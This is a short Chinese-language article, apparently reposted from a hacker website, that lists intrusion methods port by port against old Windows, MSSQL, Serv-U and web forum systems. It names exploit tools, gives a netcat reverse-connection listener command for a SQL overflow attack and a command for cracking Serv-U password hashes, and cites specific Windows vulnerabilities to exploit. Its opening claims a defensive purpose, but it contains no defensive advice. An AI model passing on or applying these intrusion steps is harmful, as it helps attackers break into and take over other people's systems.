工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。 

　　1. 1433端口入侵 

　　scanport.exe 查有1433的机器 

　　SQLScanPass.exe 进行字典暴破（字典是关键） 

　　最后 SQLTools.exe入侵 

　　============================= 

　　对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 

　　nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 

　　（以上反向的，测试成功） 

　　sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 
　　 
　　2. 4899端口入侵 

　　用4899过滤器.exe，扫描空口令的机器 　　 

　　3. 3899的入侵 

　　对很早的机器，可以试试3389的溢出(win3389ex.exe) 

　　对2000的机器，可以试试字典暴破。(tscrack.exe) 
　　 
　　4. 80入侵 

　　对sp3以前的机器，可以用webdav入侵； 

　　对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） 

　　可以利用SQL进行注入。（小榕的注入软件）。 

　　5. serv-u入侵(21端口） 

　　对5. 004及以下系统，可用溢出入侵。（serv5004.exe） 

　　对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe） 

　　====================================== 

　　对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） 

　　输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 
　　 
　　6. 554端口 

　　用real554.exe入侵。 
　　 
　　7. 6129端口 

　　用DameWare6129.exe入侵。 

　　8. 系统漏洞 

　　利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 

　　进行溢出入侵。 

　　9. 3127等端口 

　　可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 

　　10. 其他入侵 

　　利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。


本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：http://www.hackbase.com/tech/2009-01-07/43016.html